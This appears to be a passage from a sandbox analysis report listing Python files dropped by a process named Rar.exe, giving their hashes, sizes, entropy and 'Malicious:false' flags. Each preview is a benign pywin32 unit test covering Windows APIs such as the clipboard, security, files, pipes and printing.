                                                                                                                                                                                                                                  SSDEEP:48:l983zkCeM2cH6EXhnHXQetwU3CzTIVJM4WOdzEa9TIVNWdx17a0d2jlfS:HSzQncjA09SzTIVJiS9TIVwdxE0d2jlq
                                                                                                                                                                                                                                  MD5:707A3C38CA9599DEE8D886F84AC1048C
                                                                                                                                                                                                                                  SHA1:F3A07C7B293C479A48631895FEE5FC7B72ED45C1
                                                                                                                                                                                                                                  SHA-256:CC1A7875EF1EC4B6B5C50FCFA5EE92D386E69EF6DF4DB2FF6F4E8B081E16A0B2
                                                                                                                                                                                                                                  SHA-512:1B1D2FA8F2C469178DA6C93926C5BFF38CA3050B17AE857E3321EAEC37E7D9C96C96C52D13A249F5D8E335092D960DCE74EA89A816692DD02AD6CF35AA074922
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# General test module for win32api - please add some :).import array.import os.import sys.import unittest..import pywintypes.import win32con.import win32gui.from pywin32_testutil import str2bytes.from win32clipboard import *..custom_format_name = "PythonClipboardTestFormat"...class CrashingTestCase(unittest.TestCase):. def test_722082(self):. class crasher(object):. pass.. obj = crasher(). OpenClipboard(). try:. EmptyClipboard(). # This used to crash - now correctly raises type error.. self.assertRaises(TypeError, SetClipboardData, 0, obj). finally:. CloseClipboard()...class TestBitmap(unittest.TestCase):. def setUp(self):. self.bmp_handle = None. try:. this_file = __file__. except NameError:. this_file = sys.argv[0]. this_dir = os.path.dirname(this_file). self.bmp_name = os.path.join(. os.path.abspath(this_dir), "..", "Demo
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8401
                                                                                                                                                                                                                                  Entropy (8bit):4.658954261945094
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:So/OWyYIRBuPHT7+F32bA2SV+SCJE+SCJbu1pZV2+SY1QN95pxJUyXRvUgLIUqr8:/rnPNFNiZrj1C5TJUng8YhYDQWq
                                                                                                                                                                                                                                  MD5:EA5E07027F4DBF3C8BB1196FAAF915A2
                                                                                                                                                                                                                                  SHA1:47CBA1C28BBFD1B9EB4E152B5B869BB6E10765DF
                                                                                                                                                                                                                                  SHA-256:242D1EA4E8096B43DB499870C4EDFA10EDA5F43B72BB8C7530D8ED8CC27D78F3
                                                                                                                                                                                                                                  SHA-512:94435C3A55280F9B818A4728C3B78258AF09F2FBD88521EDEA4B7ED8611A5025F9E972A18B13D433FE496BC8670D53C542F46239386E25D7124875CC52A53428
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Test pywin32's error semantics""".import sys.import unittest..import pythoncom.import pywintypes.import win32api.import win32file.import winerror...class TestBase(unittest.TestCase):. def _testExceptionIndex(self, exc, index, expected):. # check the exception itself can be indexed if not py3k. if sys.version_info < (3,):. self.assertEqual(exc[index], expected). # and that exception.args can is the same.. self.assertEqual(exc.args[index], expected)...class TestAPISimple(TestBase):. def _getInvalidHandleException(self):. try:. win32api.CloseHandle(1). except win32api.error as exc:. return exc. self.fail("Didn't get invalid-handle exception.").. def testSimple(self):. self.assertRaises(pywintypes.error, win32api.CloseHandle, 1).. def testErrnoIndex(self):. exc = self._getInvalidHandleException(). self._testExceptionIndex(exc, 0, winerror.ERROR_INVALID_HANDLE).. def test
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8472
                                                                                                                                                                                                                                  Entropy (8bit):4.201102143048348
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:gUhWzBHkMBDTwqO10iXNMy0Re5qN/iXb1iES61Ypz6jYpMQUkXlsK9SH2F2fupUO:gUCMmeMym/I1RBLup2q
                                                                                                                                                                                                                                  MD5:BD17A4E829646A8C6BFD0AD0E92C33D1
                                                                                                                                                                                                                                  SHA1:7C73924F5EE596727E9B2D09F5053CCA3D5ED402
                                                                                                                                                                                                                                  SHA-256:C1915D09E993B9A0ADD6473CDF1875ECE33242560FA283D4799F191F8D7CB40D
                                                                                                                                                                                                                                  SHA-512:64EBF976C4AE5C1193CD9C5B811B133B227E040F5BE17738A0F684C3BFB0F0DB10665A880A4E429A732A1FA258344A575CFA7CAB941D086B82EB2B8B87CDDDD9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# odbc test suite kindly contributed by Frank Millman..import os.import sys.import tempfile.import unittest..import odbc.import pythoncom.from pywin32_testutil import TestSkipped, str2bytes, str2memory.from win32com.client import constants..# We use the DAO ODBC driver.from win32com.client.gencache import EnsureDispatch...class TestStuff(unittest.TestCase):. def setUp(self):. self.tablename = "pywin32test_users". self.db_filename = None. self.conn = self.cur = None. try:. # Test any database if a connection string is supplied.... conn_str = os.environ["TEST_ODBC_CONNECTION_STRING"]. except KeyError:. # Create a local MSAccess DB for testing.. self.db_filename = tempfile.NamedTemporaryFile().name + ".mdb".. # Create a brand-new database - what is the story with these?. for suffix in (".36", ".35", ".30"):. try:. dbe = EnsureDispatch("DAO.DBEngine" + s
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4174
                                                                                                                                                                                                                                  Entropy (8bit):4.637672143449211
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:tNosBlfXH+L5MWcs+dS4UOFHFaobEUo8hHFcocGu2E+SRNATocQSRNW6h6zJsajn:v7BlmTsrMobDo8VCddeD6VThwUflkoYq
                                                                                                                                                                                                                                  MD5:A35DD3413F96F8865095071BA336714D
                                                                                                                                                                                                                                  SHA1:040F057F3A635E26C6DC118431707F7A537C69D2
                                                                                                                                                                                                                                  SHA-256:5BACA647B02030064503F9F3AEEB3D9BA60DB7F6CAC841AB0E482EF686D67A7E
                                                                                                                                                                                                                                  SHA-512:8B623CFA039D136860BDEB8795E385D7DDDB80B9BC617CF88788B6E3E19DC2AD3B3BDB4A47CB11403F6E4866F3E49B2E10A201D1513A638A513875D554C80592
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import datetime.import operator.import sys.import time.import unittest..import pywintypes.from pywin32_testutil import ob2memory, str2bytes...class TestCase(unittest.TestCase):. def testPyTimeFormat(self):. struct_current = time.localtime(). pytime_current = pywintypes.Time(struct_current). # try and test all the standard parts of the format. # Note we used to include '%Z' testing, but that was pretty useless as. # it always returned the local timezone.. format_strings = "%a %A %b %B %c %d %H %I %j %m %M %p %S %U %w %W %x %X %y %Y". for fmt in format_strings.split():. v1 = pytime_current.Format(fmt). v2 = time.strftime(fmt, struct_current). self.assertEqual(v1, v2, "format %s failed - %r != %r" % (fmt, v1, v2)).. def testPyTimePrint(self):. # This used to crash with an invalid, or too early time.. # We don't really want to check that it does cause a ValueError. # (as hopefully t
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6062
                                                                                                                                                                                                                                  Entropy (8bit):4.7616285907258655
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:04wcdxEB2ZSCeZQB1ZLp7CeH/ofXhGhFXhvhCue9quC6gNBn/9zZ9C/WflV9y5+C:nrEB2ZSFeZ97FApULJCxA1Xi
                                                                                                                                                                                                                                  MD5:6CA4F005229E95EEC6E06F171FADC39D
                                                                                                                                                                                                                                  SHA1:3329FA02380512F6D6FF6F4A90B3B8CDB740290F
                                                                                                                                                                                                                                  SHA-256:C03DA11EE20F451145E9988056BF247E60F1FF16F91D3592F8537E420BE0DAC7
                                                                                                                                                                                                                                  SHA-512:9127B7140C9A0FFFD02B12D9728DE19DE4BB0254DA8841FA43E23DB3CF14FD3AF89F45A3B2D909C1ABB115B6D2869CC9260FF4D7F20B86DBB8825FAA5DBA17C8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Tests for the win32security module..import unittest..import ntsecuritycon.import pywintypes.import win32api.import win32con.import win32security.import winerror.from pywin32_testutil import TestSkipped, ob2memory, testmain...class SecurityTests(unittest.TestCase):. def setUp(self):. self.pwr_sid = win32security.LookupAccountName("", "Power Users")[0]. try:. self.admin_sid = win32security.LookupAccountName("", "Administrator")[0]. except pywintypes.error as exc:. # in automation we see:. # pywintypes.error: (1332, 'LookupAccountName', 'No mapping between account names and security IDs was done.'). if exc.winerror != winerror.ERROR_NONE_MAPPED:. raise. self.admin_sid = None.. def tearDown(self):. pass.. def testEqual(self):. if self.admin_sid is None:. raise TestSkipped("No 'Administrator' account is available"). self.assertEqual(. win32security
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8302
                                                                                                                                                                                                                                  Entropy (8bit):4.875534408590997
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:FBX6jbS83P2gdpH7LS8iiNdD2gXQR6cDGeQ7hS2R3EHQC4JwOkyB5D4BGQaFHT8T:FMjxy8eQ4jTLX
                                                                                                                                                                                                                                  MD5:EE93B23110B338A67D7B16EE25FA9C74
                                                                                                                                                                                                                                  SHA1:57DECEBFD48BE30E7FC3BEB2F6D918EB4254211A
                                                                                                                                                                                                                                  SHA-256:F47AB384C7FB9F7A91DF36A23AA2FE04F24F0C4263C00227DA6295119A32E98C
                                                                                                                                                                                                                                  SHA-512:2613DA7651AA4B78992742ECE85726AA3E14D979C73C90B2D2C9BB2A4ACE11BA1EB8E9442B5F72DF54B2E1A10F0B5545A23FFB9A987A2EB5BFF1452069019A8B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Some tests of the win32security sspi functions..# Stolen from Roger's original test_sspi.c, a version of which is in "Demos".# See also the other SSPI demos..import re.import unittest..import sspi.import sspicon.import win32api.import win32security.from pywin32_testutil import TestSkipped, str2bytes, testmain...# It is quite likely that the Kerberos tests will fail due to not being.# installed. The NTLM tests do *not* get the same behaviour as they should.# always be there..def applyHandlingSkips(func, *args):. try:. return func(*args). except win32api.error as exc:. if exc.winerror in [. sspicon.SEC_E_NO_CREDENTIALS,. sspicon.SEC_E_NO_AUTHENTICATING_AUTHORITY,. ]:. raise TestSkipped(exc). raise...class TestSSPI(unittest.TestCase):. def assertRaisesHRESULT(self, hr, func, *args):. try:. return func(*args). raise RuntimeError("expecting %s failure" % (hr,)). except win32security.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9777
                                                                                                                                                                                                                                  Entropy (8bit):4.737552851480279
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:DnnthSWhtC9JDMNUT6BykBhRGmRBKKbbq:DHwnTkhBSSy
                                                                                                                                                                                                                                  MD5:9594739675AC8888353B9128957829E3
                                                                                                                                                                                                                                  SHA1:C5238B021894FC502967B174245558371E60AC51
                                                                                                                                                                                                                                  SHA-256:7E4C25D092C23E3B72EE250646723A651FDF01D8897A9B070CA9D14974BC2B5B
                                                                                                                                                                                                                                  SHA-512:C5F80160BBA272FD56B3E8D34796CE6F55C772FC1B8B2EEA8FC8AB3E4E8A20234DFA4ADAE18D6A41688BC03D98CA92A35C74C19E457836E5BB4C520E5CDC874E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# General test module for win32api - please add some :)..import datetime.import os.import sys.import tempfile.import unittest..import win32api.import win32con.import win32event.import winerror.from pywin32_testutil import TestSkipped, str2bytes...class CurrentUserTestCase(unittest.TestCase):. def testGetCurrentUser(self):. domain = win32api.GetDomainName(). if domain == "NT AUTHORITY":. # Running as a service account, so the comparison will fail. raise TestSkipped("running as service account"). name = "%s\\%s" % (domain, win32api.GetUserName()). self.assertEqual(name, win32api.GetUserNameEx(win32api.NameSamCompatible))...class TestTime(unittest.TestCase):. def testTimezone(self):. # GetTimeZoneInformation. rc, tzinfo = win32api.GetTimeZoneInformation(). if rc == win32con.TIME_ZONE_ID_DAYLIGHT:. tz_str = tzinfo[4]. tz_time = tzinfo[5]. else:. tz_str = tzinfo[1].
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4348
                                                                                                                                                                                                                                  Entropy (8bit):4.720005452927387
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:nGTNTZHftZ6VavazzOwoG+NbJXGa/Y7/fNSLGhLOL/LpFyQTu1nPyi:nGTNVYPOw3kW6YwQSz3yzpai
                                                                                                                                                                                                                                  MD5:1CF5B09510844FF5502DC5B220560F95
                                                                                                                                                                                                                                  SHA1:A0897F1482D46F77E6495F3F7AFC104899539A26
                                                                                                                                                                                                                                  SHA-256:C26885E898631804BB04402F9976AE2BE813C96E43491CFDC52A9081A12C8FD7
                                                                                                                                                                                                                                  SHA-512:6590871E9392D4A48E74B31DBF4B8A053C6C4807E74857A987D57D93D0D13B493144BC6582E08FA426131DA230B8D4C4CD9165499A0ECAC534AA2AF2D97C153D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Test module for win32crypt..import contextlib.import unittest.from typing import Any, Iterator..import win32crypt.from pywin32_testutil import TestSkipped, find_test_fixture, testmain.from win32cryptcon import *...class Crypt(unittest.TestCase):. def testSimple(self):. data = b"My test data". entropy = None. desc = "My description". flags = 0. ps = None. blob = win32crypt.CryptProtectData(data, desc, entropy, None, ps, flags). got_desc, got_data = win32crypt.CryptUnprotectData(. blob, entropy, None, ps, flags. ). self.assertEqual(data, got_data). self.assertEqual(desc, got_desc).. def testEntropy(self):. data = b"My test data". entropy = b"My test entropy". desc = "My description". flags = 0. ps = None. blob = win32crypt.CryptProtectData(data, desc, entropy, None, ps, flags). got_desc, got_data = win32crypt.CryptUnprotectData(. blob, entro
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4368
                                                                                                                                                                                                                                  Entropy (8bit):4.690266362009521
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:uBZpBvpjiDWFpjSXSjvDpwWlXySJH6jHN6HzS5V6pLqx7rLK0EI1ZcVZ3q:gfBvZiDWFZSXSjvDpwWUS16TNUzFpLq5
                                                                                                                                                                                                                                  MD5:DBC9AF40F38CB83121A9E353B9E9F4DC
                                                                                                                                                                                                                                  SHA1:843B250EA21D3143DA09A8FA1151C95753A9D65B
                                                                                                                                                                                                                                  SHA-256:5D0A81BDAF6B31854D8AEEE3026C2120C7A9CE67BA7E721DEE59BBC502D37B0E
                                                                                                                                                                                                                                  SHA-512:B2BB5BAE444FAD9EDC744B36134747F994619DA1112092D4B6E66A07FED93D0358795CEBE324EC42CC3D5238C8E9738DFE0201B03DCD35016606A33121AB2158
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import pywintypes.import win32event...class TestWaitableTimer(unittest.TestCase):. def testWaitableFire(self):. h = win32event.CreateWaitableTimer(None, 0, None). dt = -160 # 160 ns.. win32event.SetWaitableTimer(h, dt, 0, None, None, 0). rc = win32event.WaitForSingleObject(h, 1000). self.assertEqual(rc, win32event.WAIT_OBJECT_0).. def testCreateWaitableTimerEx(self):. h = win32event.CreateWaitableTimerEx(. None,. None,. win32event.CREATE_WAITABLE_TIMER_HIGH_RESOLUTION,. win32event.TIMER_ALL_ACCESS,. ). dt = -160 # 160 ns.. win32event.SetWaitableTimer(h, dt, 0, None, None, 0). rc = win32event.WaitForSingleObject(h, 1000). self.assertEqual(rc, win32event.WAIT_OBJECT_0).. def testWaitableTrigger(self):. h = win32event.CreateWaitableTimer(None, 0, None). # for the sake of this, pass a long that doesn't fit in an int.. dt =
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):41414
                                                                                                                                                                                                                                  Entropy (8bit):4.594168917066703
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:cIh0aKGyRwRGUtfoKkTu3zCz69SNrCs9MNzz:cIcUSK59SNl6
                                                                                                                                                                                                                                  MD5:B01817532C78A687745ACA880BD3EA14
                                                                                                                                                                                                                                  SHA1:0FA966057DA2955C9210E9BD87ED461B5EE1258C
                                                                                                                                                                                                                                  SHA-256:A1593D886BBA6F5CBE6C3DC35E11F8FD4655BAAEAAB8FA13B0121F6E06200FEF
                                                                                                                                                                                                                                  SHA-512:09B9FD7341C605E83DC2B66F375CDC5148D340EF9290D229EF64E1932C9EF3EAC98D3F99262F1449EE3A2646969566D349D9151FEBBE69BAFED9CC57EFE2FA38
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import datetime.import os.import random.import shutil.import socket.import tempfile.import threading.import time.import unittest..import ntsecuritycon.import pywintypes.import win32api.import win32con.import win32event.import win32file.import win32pipe.import win32timezone.import winerror.from pywin32_testutil import TestSkipped, str2bytes, testmain..try:. set.except NameError:. from sets import Set as set...class TestReadBuffer(unittest.TestCase):. def testLen(self):. buffer = win32file.AllocateReadBuffer(1). self.assertEqual(len(buffer), 1).. def testSimpleIndex(self):. buffer = win32file.AllocateReadBuffer(1). buffer[0] = 0xFF. self.assertEqual(buffer[0], 0xFF).. def testSimpleSlice(self):. buffer = win32file.AllocateReadBuffer(2). val = str2bytes("\0\0"). buffer[:2] = val. self.assertEqual(buffer[0:2], val)...class TestSimpleOps(unittest.TestCase):. def testSimpleFiles(self):. fd, filename = tem
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2302
                                                                                                                                                                                                                                  Entropy (8bit):4.717077495501314
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:bWT/FjXsP4D4O4AzIpbWsdKMns71gnswF7AIs72RrsibpVS:iTdj7EDAzu7KMB/NJ5bfS
                                                                                                                                                                                                                                  MD5:9839103A9BD6F1BAF4EAE2B7049BB275
                                                                                                                                                                                                                                  SHA1:88D504A84342DDF66DEB4DE8D8441B8F976C6611
                                                                                                                                                                                                                                  SHA-256:25938BF01CCD24988D82267FDEC66EB77AB4391B979664C63408F3F5E1D4EEAD
                                                                                                                                                                                                                                  SHA-512:1B9BBA0BBCD2826757BAB4C063485C9C8938CAD6552D00ACD2ECCEAB0FFC5F3B5C2F6E55A77A16EB36D02E9DB5866A7979E941CE22F9C43955890F8848719127
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# tests for win32gui.import array.import operator.import unittest..import pywin32_testutil.import win32gui...class TestPyGetString(unittest.TestCase):. def test_get_string(self):. # test invalid addresses cause a ValueError rather than crash!. self.assertRaises(ValueError, win32gui.PyGetString, 0). self.assertRaises(ValueError, win32gui.PyGetString, 1). self.assertRaises(ValueError, win32gui.PyGetString, 1, 1)...class TestPyGetMemory(unittest.TestCase):. def test_ob(self):. # Check the PyGetMemory result and a bytes string can be compared. test_data = b"\0\1\2\3\4\5\6". c = array.array("b", test_data). addr, buflen = c.buffer_info(). got = win32gui.PyGetMemory(addr, buflen). self.assertEqual(len(got), len(test_data)). self.assertEqual(bytes(got), test_data).. def test_memory_index(self):. # Check we can index into the buffer object returned by PyGetMemory. test_data = b"\0\1\2\3\4\5\6".
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9207
                                                                                                                                                                                                                                  Entropy (8bit):4.533453807750783
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:nWriufXQ/QFNgSE/wFNNLeWt6bETl3RVFHg1BE2xdF+V1K++V3b6vXEFcccUTcH2:exXGQFNgSywFNNLdtqrXTKXnVXHWXwq
                                                                                                                                                                                                                                  MD5:70BD28AEBE79AF642176356266E86D33
                                                                                                                                                                                                                                  SHA1:FBCA88DB18EAAF543337A1000A98AAD79334B27C
                                                                                                                                                                                                                                  SHA-256:90D0EA872D2FBF16E54A88674A9757C6A0C1E017E32D18B9ED2BEF4D1F9790C0
                                                                                                                                                                                                                                  SHA-512:9A83B04471386AAEB6784333027817724BBA387991E6E0686D047B6170624DFE27517E7C40FEED775429C0D5C2595ACB525E1F12FADC436AEB0E99C641EF140D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import array.import unittest..import pythoncom.import win32con.import win32gui.import win32gui_struct...class TestBase(unittest.TestCase):. def assertDictEquals(self, d, **kw):. checked = dict(). for n, v in kw.items():. self.assertEqual(v, d[n], "'%s' doesn't match: %r != %r" % (n, v, d[n])). checked[n] = True. checked_keys = list(checked.keys()). passed_keys = list(kw.keys()). checked_keys.sort(). passed_keys.sort(). self.assertEqual(checked_keys, passed_keys)...class TestMenuItemInfo(TestBase):. def _testPackUnpack(self, text):. vals = dict(. fType=win32con.MFT_MENUBARBREAK,. fState=win32con.MFS_CHECKED,. wID=123,. hSubMenu=1234,. hbmpChecked=12345,. hbmpUnchecked=123456,. dwItemData=1234567,. text=text,. hbmpItem=321,. ). mii, extras = win32gui_struct.PackMENUITEMINFO(**vals). (.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3119
                                                                                                                                                                                                                                  Entropy (8bit):4.5523866481379365
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zfKwKrRJv8sWEFOphvScSkXGSOW8Ra8Ti:qPtcScSDVRri
                                                                                                                                                                                                                                  MD5:30F3C8445F7A56D3A6A07D084086F837
                                                                                                                                                                                                                                  SHA1:6AF609BF8A6FED9C17C5AFA907B2E13D01280F4D
                                                                                                                                                                                                                                  SHA-256:FC5CDEC444E91779C64EB1BFCA9C089F3EC5FDDA916C857C79C436417834F3C2
                                                                                                                                                                                                                                  SHA-512:2AF989A15B3DB5029104BA44CB37CE2E96F59E0BFF9396921419C1E9D26C51BA9A93679AF0C7F31DF463185DE81990DE6D6DA64C8ED8D2210818B9E4CDB177BC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import winerror.from pywin32_testutil import str2bytes # py3k-friendly helper.from pywin32_testutil import TestSkipped, testmain.from win32inet import *.from win32inetcon import *...class CookieTests(unittest.TestCase):. def testCookies(self):. data = "TestData=Test". InternetSetCookie("http://www.python.org", None, data). got = InternetGetCookie("http://www.python.org", None). # handle that there might already be cookies for the domain.. bits = map(lambda x: x.strip(), got.split(";")). self.assertTrue(data in bits).. def testCookiesEmpty(self):. try:. InternetGetCookie("http://site-with-no-cookie.python.org", None). self.fail("expected win32 exception"). except error as exc:. self.assertEqual(exc.winerror, winerror.ERROR_NO_MORE_ITEMS)...class UrlTests(unittest.TestCase):. def testSimpleCanoniuserze(self):. ret = InternetCanoniuserzeUrl("foo bar"). self.ass
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):654
                                                                                                                                                                                                                                  Entropy (8bit):4.2763245113043284
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:LLfJ4LfzmlIuXi7aL9xrClXlfvNKEdtevSobuXi1FC7hGtfTteNy2pV7u:JumlIKIaL9x2JlfVKE1eK40sUHpVS
                                                                                                                                                                                                                                  MD5:6517E211765BE18E6404AFDD997C8BF0
                                                                                                                                                                                                                                  SHA1:0624B162D53626409F7E2695EDEF22D8A2BE4AC3
                                                                                                                                                                                                                                  SHA-256:C16266E7473FBED90C72820700F36236FCDC3E103A8D7EC38D990514245B7D79
                                                                                                                                                                                                                                  SHA-512:A28CD960ED1F4F23176AF14980B81315A3AC85645FFBE4745A4762B9A8A93071FED11CE4DCFEBBBDA6B7F3530ACFB6129C18966CD1367B0FD02C088DBFE0051C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import win32net.import win32netcon...class TestCase(unittest.TestCase):. def testGroupsGoodResume(self, server=None):. res = 0. level = 0 # setting it to 1 will provide more detailed info. while True:. (user_list, total, res) = win32net.NetGroupEnum(server, level, res). for i in user_list:. pass. if not res:. break.. def testGroupsBadResume(self, server=None):. res = 1 # Can't pass this first time round.. self.assertRaises(win32net.error, win32net.NetGroupEnum, server, 0, res)...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5007
                                                                                                                                                                                                                                  Entropy (8bit):4.707530904909143
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:jvp065vE0nI1jmQ4cOYBXc6YBkycTPk0Cczq:7nI16Q4cOYBXc6YBkycTPk0Cczq
                                                                                                                                                                                                                                  MD5:82B8034B800E3839C5A973E495B91D10
                                                                                                                                                                                                                                  SHA1:CB1A55C670BED07E8A2C4E1C5643CB9E4FE27276
                                                                                                                                                                                                                                  SHA-256:6A564ED70F0E79A5ED160540A0A5B2405E4BF404930B431FB8B743C6F8C176EB
                                                                                                                                                                                                                                  SHA-512:FFCB2522AB15717DF4D687CA14CCDD3B5B7D8B7D2423BB92C94EB4919D7FF223A145AFEB9FA77AADE1F8B27202561911230A05600469BD80DEE64021A2D9C810
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import threading.import time.import unittest..import pywintypes.import win32con.import win32event.import win32file.import win32pipe.import winerror.from pywin32_testutil import str2bytes # py3k-friendly helper...class PipeTests(unittest.TestCase):. pipename = "\\\\.\\pipe\\python_test_pipe".. def _serverThread(self, pipe_handle, event, wait_time):. # just do one connection and terminate.. hr = win32pipe.ConnectNamedPipe(pipe_handle). self.assertTrue(. hr in (0, winerror.ERROR_PIPE_CONNECTED), "Got error code 0x%x" % (hr,). ). hr, got = win32file.ReadFile(pipe_handle, 100). self.assertEqual(got, str2bytes("foo\0bar")). time.sleep(wait_time). win32file.WriteFile(pipe_handle, str2bytes("bar\0foo")). pipe_handle.Close(). event.set().. def startPipeServer(self, event, wait_time=0):. openMode = win32pipe.PIPE_ACCESS_DUPLEX. pipeMode = win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_WAIT..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):681
                                                                                                                                                                                                                                  Entropy (8bit):4.600120055398157
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:Lq42LdWU6QPJv/MPoYiSIkYdVhQMeZewofMm5bVHYRF2pV7u:WWUC1iSIkYzhcZe9m0pVS
                                                                                                                                                                                                                                  MD5:CA7875992F54668EE4C26B3E048F45D2
                                                                                                                                                                                                                                  SHA1:55A9F5610A0DCE2B4A618E450B1ACC532E10AC11
                                                                                                                                                                                                                                  SHA-256:1B1D69A6E32BCA5FAC96182ACB8DFD35AE8F48B452F2DD61BE67414AB79A42C4
                                                                                                                                                                                                                                  SHA-512:CE6AC1C67301052E0104C574BC510A62A8A63DF982C387B78EB04BA35628E39FFF1DA630B6FE550FEF7F95DBF233914909FE83BA9C9C1C3B25A540708C986EE4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Tests (scarce) for win32print module..import unittest..import win32print as wprn...class Win32PrintTestCase(unittest.TestCase):. def setUp(self):. self.printer_idx = 0. self.printer_levels_all = list(range(1, 10)). self.local_printers = wprn.EnumPrinters(wprn.PRINTER_ENUM_LOCAL, None, 1).. def test_printer_levels_read_dummy(self):. if not self.local_printers:. print("Test didn't run (no local printers)!"). return. ph = wprn.OpenPrinter(self.local_printers[self.printer_idx][2]). for level in self.printer_levels_all:. wprn.GetPrinter(ph, level)...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):389
